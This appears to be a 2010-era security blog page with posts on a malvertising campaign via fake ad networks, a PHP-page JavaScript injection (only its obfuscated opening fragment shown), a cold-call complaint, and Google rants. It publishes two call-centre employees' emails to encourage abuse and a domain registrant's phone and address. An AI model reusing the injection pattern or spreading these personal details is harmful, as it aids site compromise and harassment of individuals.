More fake ad networks

The German news site Handelsblatt was recently the victim of a malvertising campaign:

02.02.2010 Handelsblatt malware on Web site

Update: Infection banners confirmed!

The S-CERT was able to reproduce the infection in its test laboratory on the IHT website. Infection occurs through an advertising banner, which is from "Doubleclick.net. This will in turn include advertisements from the domain "muentely.com" in the Handelsblatt-page insert. The latter site is obviously manipulated and contains malicious JavaScript code.

Further investigations in the S-CERT laboratory testing have confirmed that will be used including a PDF vulnerability to the spread of malware. The studies also show that there is an alternative to the vulnerability, attempts to exploit gaps by further appropriate attack code to install a malware onto vulnerable PCs.

According to the investigations of the S-CERT is the malware with the accessing PCs will eventually become infected, a so-called Scareware: Users are informed by insertion of appropriate dialogue, that their PC is infected with malware wide area. To remove this malware, an appropriate protective software is available for purchase. To give emphasis to the malware message that ensures Scareware that can be started on any new applications over infected PCs. Relevant information of users may also indicate an infection.

The malware campaign was running via Doubleclick and Nuggad.net, directing through a bunch of domains that look like ad agencies but aren't before ending up in a server in Panama.

The fake ad agencies are in the 213.163.75.x range, all recently registered through BIZCN.COM in China, a fairly well known black hat registrar.

Note that while the domains appear to be fake, the registration data may include the details of innocent third parties, so I have not published it here. I would recommend avoiding doing business with them unless you can absolutely verify their credentials.
Synopsystd.com

• Namdoline.com
• Quintat.com
• Bradfortnd.com
• Ealana.com
• Rovitalt.com
• Favorti.com
• Muentely.com
• Briarmod.com
• Deltamsc.com
• Jessiereet.com
• Startrailrs.com
• Connata.com
• Vehiced.com
• Essiell.com
• Holdrism.com
• Bellwaynetworks.com
• Forlifemedia.com
• Revoltechmarketing.com
• Hickoryhs.com
• Ingramctc.com
• Luxortd.com
• Morrelmedia.com
• Gappion.com
• Savoyee.com
• Goldbaynetwork.com

"Hello, this is Icon calling on behalf of BT.."

The phone rings from an undisclosed International number.. an automated voice say "Hello, this is Icon calling on behalf of BT.." and it then goes on to explain that there's nobody to talk to me and I should call back on 0800 980 0127 to unsubscribe. Except of course that I'm bloody on TPS.

So who are they? Icon Communications Centers are based in Prague and have a website at www.icon-cc.com (no, I'm not giving them a link). In fact, the crummy job is advertised right here. OK, I say crummy.. the good thing is that Prague is a very nice place, but you probably won't see to much of it in a call centre.

In the important spirit of pissing cold callers off, here are a couple of contact email addresses you can use to tell them where to go: helen.hickin@icon-cc.com and moses.velasco@icon-cc.com.

Enjoy.

Sergey Ryabov / director@climbing-games.com strikes again

There's a somewhat unusual spate of injection attacks doing the rounds, code is being injected into the middle of victim pages through an unknown flaw, starting document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D and then going on for a bit.. deobfuscating the code actually leads to a second layer of obfuscation, but once that is decoded it becomes clearer.

The injected code points to itsallbreaksoft.net


This then bounces through paymoneysystem.info/in.cgi?michaeleknowlton before hitting a seemingly random PPC search engine site hosted on 95.211.27.154, for example sdeh.net/iframe.html. Sophos have an excellent write-up of the anatomyof the injection attack here, and it's pretty clear that somebody is ripping somebody else off for PPC traffic.. its hard to say who the victims actually are.

The domains itsallbreaksoft.net and paymoneysystem.info belong to the same person, these are interesting because of the registration details:

Nexton Limited
Ryabov Sergey (director@climbing-games.com)
+79219270961
Fax: +79219270961
Scherbakova st., 6-38
Saint-Petersburg, 197375
RU

These contact details are very well known for very bad things. Incidentally, the registrar is ruler-domains.com, also an enterprise registered to "Sergey Ryabov" (if that's a real person).

It's all kind of strange as there doesn't appear to be a malware payload, which is good. But because of the way click arbitrage works, finding the real victims and villains is tricky, although interested researchers may want to have a poke around.

Using Google Images to fight fraud

A great post from the guys at F-Secure about how an employee used Google Images to stop being ripped off. Probably a good tip to stop getting defrauded at auction sites.

Pathetic

A multibillion dollar company operated by a bunch of f*cking amateurs.

In particular.. the bit that says "We are building a migration tool", but for some unfathomable reason we have decided to kick off this change before it's ready. Sure, Blogger is a free platform and I could always ask for my money back.

Another favourite is: "only .5% of active blogs are published via FTP".. and the reason for this is that for the past couple of years Blogger's FTP service has become increasingly unreliable for no particular reason.

Unfortunately, anyone who had business dealings with Google that involve real money will know that the the f*ck you attitude to customer service is very much ingrained in Google. To a certain extent, being jerked around when you are not paying for the service is one thing.. but business partners in things like advertising, YouTube and enterprise applications also suffer the same thing.

Yes, Google is still often awesome. But sometimes, like this time, it's just pathetic.